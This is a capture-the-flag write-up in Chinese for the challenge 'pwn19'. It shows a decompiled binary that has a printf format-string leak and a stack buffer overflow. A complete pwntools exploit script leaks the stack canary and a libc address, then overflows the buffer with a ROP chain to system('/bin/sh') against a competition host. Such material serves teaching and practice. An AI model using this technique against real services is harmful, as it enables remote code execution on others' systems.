这是一个简单的printf+溢出题,可以输入2次6字节的串作为printf的格式串,然后再输入一个串造成溢出。
// Decompiler-style (IDA) listing of the challenge binary's main(). The writeup
// relies on two defects visible below: user data passed to printf() as the
// format string, and an unbounded read() into a fixed-size stack buffer.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int v5; // [rsp+Ch] [rbp-34h] — loop counter, runs the echo loop twice (0 and 1)
    __int64 buf[5]; // [rsp+10h] [rbp-30h] BYREF — 40-byte stack buffer; the canary v7 lies 0x28 bytes above it
    unsigned __int64 v7; // [rsp+38h] [rbp-8h] — saved copy of the stack-protector canary
    v7 = __readfsqword(0x28u); // copy the per-thread canary (fs:0x28 on x86-64 glibc) for the check at the end
    buf[0] = 0LL;
    buf[1] = 0LL;
    buf[2] = 0LL;
    buf[3] = 0LL; // note: buf[4] is never zeroed here
    v5 = 0;
    init(argc, argv, envp); // defined elsewhere in the binary; presumably I/O setup — not visible here
    puts("echo server start up");
    while ( v5 <= 1 ) // exactly two iterations
    {
        // Read at most 6 bytes and NUL-terminate at the returned length.
        // If read() fails it returns -1, so the terminator would land one byte before buf.
        *((_BYTE *)buf + (int)read(0, buf, 6uLL)) = 0;
        // FORMAT-STRING BUG: the user-controlled buffer is used as the format string, so
        // positional specifiers such as "%N$p" print arbitrary stack slots. The writeup
        // reads slot 13 (the canary) and slot 15 (a return address inside libc).
        // Fix: printf("%s", buf);
        printf((const char *)buf);
        ++v5;
    }
    puts("your gift~");
    // STACK BUFFER OVERFLOW: up to 0x100 bytes are read into the 40-byte buf, overrunning
    // the canary, saved rbp and the return address. The canary check below only helps while
    // the canary is secret, which the leak in the loop above defeats.
    // Fix: bound the read to sizeof(buf) - 1 and NUL-terminate the result.
    read(0, buf, 0x100uLL);
    // Stack-protector comparison; the decompiler presumably folds the __stack_chk_fail
    // path into this return expression.
    return __readfsqword(0x28u) ^ v7;
}
这个题有canary,所以溢出时一定要带上canary;另外一个必需的就是libc地址,所以这两次printf的偏移确定为13和15
题目没有给libc,所以需要得到libc地址后再查版本,通过第一步查到是libc-2.23-0ubuntu11.3就能用。由于开了PIE,加载地址是随机的,所以pop_rdi也要从libc里找
# Writeup exploit script (pwntools). It chains the two defects in the binary's
# main(): the printf format-string leak (canary and a libc address) and the
# 0x100-byte read into the 40-byte stack buffer. Both are removed by
# printf("%s", buf) plus a bounded read; the stack canary alone does not help
# once its value has been leaked.
from pwn import *
local =0
if local == 1:
    # Local run of the binary with the system libc (2.31 per the author's note).
    p = process('./pwn19')
    libc_elf = ELF('/lib/x86_64-linux-gnu/libc.so.6') #2.31
    # Offset inside libc of the return address that the second leak exposes
    # (presumably the instruction after the call into main within __libc_start_main);
    # it differs per libc build, hence one value per target.
    libc_start_main_ret = 0x0270b3
else:
    # Competition instance; libc identified as 2.23-0ubuntu11.3 (see the text above).
    p = remote('82.157.18.9', 55302)
    libc_elf = ELF('./libc6_2.23-0ubuntu11.3_amd64.so')
    libc_start_main_ret = 0x020840
context(arch='amd64', log_level='debug')
# First echo round: "%13$p" makes the vulnerable printf print stack slot 13,
# which the writeup identifies as the stack canary.
p.sendlineafter(b'n', b'%13$p')
canary = int(p.recvline()[:-1], 16)
# Second echo round: slot 15 holds a return address inside __libc_start_main;
# subtracting its known offset gives the libc load base (needed because of PIE/ASLR).
p.sendline(b'%15$p')
libc_base = int(p.recvline()[:-1], 16) - libc_start_main_ret
# Rebase a "pop rdi; ret" gadget, system() and the "/bin/sh" string found in the libc file.
pop_rdi = libc_base + next(libc_elf.search(asm('pop rdi;ret')))
system = libc_base + libc_elf.sym['system']
bin_sh = libc_base + next(libc_elf.search(b'/bin/sh'))
# Overflow layout: 0x28 bytes of padding reach the canary (buf at rbp-0x30, canary at
# rbp-0x8), then the leaked canary, a saved-rbp placeholder, a lone ret (pop_rdi+1,
# presumably for 16-byte stack alignment before system), then pop rdi / "/bin/sh" / system.
payload = flat(b'A'*0x28, canary, 0, pop_rdi+1, pop_rdi, bin_sh, system)
p.sendlineafter(b"your gift~n" , payload)
p.interactive()


![[冀信2021-pwn] pwn19 [冀信2021-pwn] pwn19](http://www.mshxw.com/aiimages/31/664866.png)
